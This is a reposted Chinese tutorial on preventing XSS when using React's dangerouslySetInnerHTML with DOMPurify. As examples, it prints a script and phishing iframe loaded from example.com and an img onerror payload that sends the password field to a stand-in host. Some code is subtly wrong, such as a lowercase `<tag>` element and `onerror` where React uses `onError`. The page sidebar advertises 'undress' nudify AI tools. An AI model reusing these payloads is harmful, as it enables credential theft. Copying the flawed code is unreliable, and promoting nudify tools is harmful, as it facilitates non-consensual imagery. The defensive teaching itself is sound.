使用 React 的'危险 SetInnerHTML”时缓解 XSS 漏洞
封面图片由 Lautaro Andreani
...
TL: DR;盲目地将内容转储到危险的SetInnerHTML 中就是这样 - 危险。确保您正在清理传递给危险SetInnerHTML 的任何输入,除非您对输入有显式控制。
以下组件作为通过危险的 SetInnerHTML 降低 XSS 攻击风险的简单示例:
//https://github.com/cure53/DOMPurify
import React from "react";
import DOMPurify from "dompurify";
const sanitize = (dirty) => DOMPurify.sanitize(dirty);
const DangerousHtml = ({ innerHTML, tag }) => {
const clean = sanitize(innerHTML);
if (typeof tag === "undefined") {
return <div dangerouslySetInnerHTML={{ __html: clean }} />;
}
return <tag dangerouslySetInnerHTML={{ __html: clean }} />;
};
export default DangerousHtml;
通过使用我们定制的 DangerousHtml 组件,我们可以显着降低 XSS 漏洞利用的风险,因为我们会在输入到达实际危险的 SetInnerHTML 属性之前对其进行清理
DOMPurify 也是高度可配置的,因此您可能希望拥有多个组件(如我们的示例)来处理特定用例或显式允许以下某些示例。
以下是一些有关漏洞利用如何发生的简短示例:
利用 iFrame 和脚本标签
XSS 是可能的,因为 React 不会删除指向恶意负载的脚本标签。
我们也不应该以这种方式传递 iFrame。相反,我们应该将 URL 和任何其他“安全”属性作为 props 传递,并在 iFrame 标记中自行渲染,以保留对其渲染能力和源的控制,或者拥有专用的 iFrame 组件。
例如,考虑一下我们从 API 请求收到的恶意标记。如果我们通过危险的SetInnerHTML盲目地设置它,我们将为用户提供以下输出:
// Bad markup going in
<div
dangerouslySetInnerHTML={{
__html: `<p>
Hi
<script src="https://example.com/malicious-tracking"></script>
Fiona, here is the link to enter your bank details:
<iframe src="https://example.com/defo-not-the-actual-bank"></iframe>
</p>`,
}}
/>
<!-- Bad markup rendered on the DOM -->
<div>
<p>
Hi
<script src="https://example.com/malicious-tracking"></script>
Fiona, here is the link to enter your bank details:
<iframe src="https://example.com/defo-not-the-actual-bank"></iframe>
</p>
</div>
但是,使用我们的 DangerousHTML 组件意味着我们已经减轻了用户可能面临的大部分风险:
// Bad markup going in
<DangerousHtml
innerHTML={`<p>
Hi
<script src="https://example.com/malicious-tracking"></script>
Fiona, here is the link to enter your bank details:
<iframe src="https://example.com/defo-not-the-actual-bank"></iframe>
</p>`}
/>
<!-- Clean markup rendered on the DOM --> <div> <p>Hi Fiona, here is the link to enter your bank details:</p> </div>
Fiona 可能认为网站因某种原因损坏或丢失内容 - 但这仍然比被钓鱼获取银行详细信息要好!
属性操纵/中毒
一些 DOM 元素具有我们可以滥用的特殊属性,我们应该保护自己免受这些属性的侵害。
在此示例中,我们可以在
例如,给出以下内容:
// Bad markup going in
<div
dangerouslySetInnerHTML={{
__html: `
<p>
Hola
<img
src='none.png'
onerror='fetch("https://example.com/malicious-tracking?password=" + document.querySelector("input#password").value);'
/>
Sharon
</p>`,
}}
/>
<!-- Bad markup rendered on the DOM -->
<div>
<p>
Hola
<img
src="none.png"
onerror='fetch("https://example.com/malicious-tracking?password=" + document.querySelector("input#password").value);'
/>
Sharon
</p>
</div>
在这种情况下,当图像请求最终失败并且用户永远不会知道时,我们的中毒标记正在从 DOM 窃取数据。
我们可以使用 DangerousHtml 组件再次缓解这种情况
// Bad markup going in
<DangerousHtml
innerHTML={`
<p>
Hola
<img
src='none.png'
onerror='fetch("https://example.com/malicious-tracking?password=" + document.querySelector("input#password").value);'
/>
Sharon
</p>`}
/>
<!-- Clean markup rendered on the DOM -->
<div>
<p>
Hola
<img src="none.png" />
Sharon
</p>
</div>
考虑到我们可能真的想执行一些 JS 来显示后备图像,我们不应该再相信原始的、未经净化的 HTML 来为我们做这件事,并且最好使用我们需要的 FallbackImageURL 或 onError 属性。可以像这样显式添加到我们的图像标签中:
// Usual imports
const MyImageComponent = ({ fallbackUrl, url }) => {
// Usual component setup
const displayFallbackImage = (evt) => {
// If there is no fallback, do nothing
if (!fallbackUrl) return;
// set the url to the fallbackUrl
evt.target.src = fallbackUrl;
};
return (
<img
src={url}
onerror={displayFallbackImage}
// ... any other props
/>
);
};
...
原创文章:https://timbryan.dev/posts/react-xss-via-dangerouslySetInnerHtml
以上是使用 React 的'危险 SetInnerHTML”时缓解 XSS 漏洞的详细内容。更多信息请关注PHP中文网其他相关文章!
热AI工具
Undress AI Tool
免费脱衣服图片
Undresser.AI Undress
人工智能驱动的应用程序,用于创建逼真的裸体照片
AI Clothes Remover
用于从照片中去除衣服的在线人工智能工具。
Clothoff.io
AI脱衣机
Video Face Swap
使用我们完全免费的人工智能换脸工具轻松在任何视频中换脸!
热门文章
热工具
记事本++7.3.1
好用且免费的代码编辑器
SublimeText3汉化版
中文版,非常好用
禅工作室 13.0.1
功能强大的PHP集成开发环境
Dreamweaver CS6
视觉化网页开发工具
SublimeText3 Mac版
神级代码编辑软件(SublimeText3)
高级JavaScript范围和上下文
Jul 24, 2025 am 12:42 AM
JavaScript的作用域决定变量可访问范围,分为全局、函数和块级作用域;上下文决定this的指向,依赖函数调用方式。1.作用域包括全局作用域(任何地方可访问)、函数作用域(仅函数内有效)、块级作用域(let和const在{}内有效)。2.执行上下文包含变量对象、作用域链和this的值,this在普通函数指向全局或undefined,在方法调用指向调用对象,在构造函数指向新对象,也可用call/apply/bind显式指定。3.闭包是指函数访问并记住外部作用域变量,常用于封装和缓存,但可能引发
如何在JavaScript中获取输入字段的值
Jul 15, 2025 am 03:09 AM
要获取HTML输入框的值,核心是通过DOM操作找到对应元素并读取value属性。1.使用document.getElementById是最直接方式,给input添加id后通过该方法获取元素并读取value;2.使用querySelector更灵活,可根据name、class、type等属性选取元素;3.可添加input或change事件监听器实现交互功能,如实时获取输入内容;4.注意脚本执行时机、拼写错误及null判断,确保元素存在后再访问value。
如何使用JS获取所选广播按钮的值?
Jul 18, 2025 am 04:17 AM
获取选中的单选按钮值的核心方法有两种。1.使用querySelector直接获取选中项,通过input[name="your-radio-name"]:checked选择器获取选中的元素并读取其value属性,适合现代浏览器且代码简洁;2.使用document.getElementsByName遍历查找,通过循环NodeList找到第一个checked的radio并获取其值,适合兼容旧浏览器或需要手动控制流程的场景;此外需注意name属性拼写、处理未选中情况以及动态加载内容时
使用JavaScript构建安全的沙盒iframe
Jul 16, 2025 am 02:33 AM
要使用JavaScript建立一个安全的沙盒iframe,首先利用HTML的sandbox属性限制iframe行为,例如禁止脚本执行、弹窗和表单提交;其次通过添加特定token如allow-scripts来按需放宽权限;接着结合postMessage()实现安全的跨域通信,同时严格验证消息来源和数据;最后避免常见配置错误,如未验证源、未设置CSP等,并在上线前进行安全性测试。
使用JavaScript中的日期对象与日期和时间一起工作
Jul 14, 2025 am 03:02 AM
JavaScript的Date对象使用需注意以下关键点:1.创建实例可用newDate()获取当前时间,或通过字符串、年月日参数指定时间,推荐ISO格式以确保兼容性;2.使用getFullYear()、getMonth()等方法获取日期时间,并手动拼接格式化字符串;3.用getUTC系列方法处理UTC时间,避免本地时区干扰;4.通过时间戳差值计算时间间隔,但需注意跨时区或夏令时可能导致的偏差。
VUE 3组成API与选项API:详细比较
Jul 25, 2025 am 03:46 AM
Vue3中CompositionAPI更适合复杂逻辑和类型推导,OptionsAPI适合简单场景和初学者;1.OptionsAPI按data、methods等选项组织代码,结构清晰但复杂组件易碎片化;2.CompositionAPI用setup集中相关逻辑,利于维护和复用;3.CompositionAPI通过composable函数实现无冲突、可参数化的逻辑复用,优于mixin;4.CompositionAPI对TypeScript支持更好,类型推导更精准;5.两者性能和打包体积无显着差异;6.
掌握JavaScript并发模式:网络工人与Java线程
Jul 25, 2025 am 04:31 AM
JavaScript的WebWorkers和JavaThreads在并发处理上有本质区别。1.JavaScript采用单线程模型,WebWorkers是浏览器提供的独立线程,适合执行不阻塞UI的耗时任务,但不能操作DOM;2.Java从语言层面支持真正的多线程,通过Thread类创建,适用于复杂并发逻辑和服务器端处理;3.WebWorkers使用postMessage()与主线程通信,安全隔离性强;Java线程可共享内存,需注意同步问题;4.WebWorkers更适合前端并行计算,如图像处理,而
用于复杂JavaScript应用的高级调试技术,利用Java调试原理
Jul 17, 2025 am 01:42 AM
调试JavaScript复杂应用需系统化使用工具。1.设断点及条件断点拦截可疑流程,如函数入口、循环、异步回调前并按条件过滤;2.启用Blackboxing功能屏蔽第三方库干扰;3.结合环境判断使用debugger语句控制调试入口;4.通过CallStack追溯调用链路,分析执行路径与变量状态,从而高效定位问题根源。
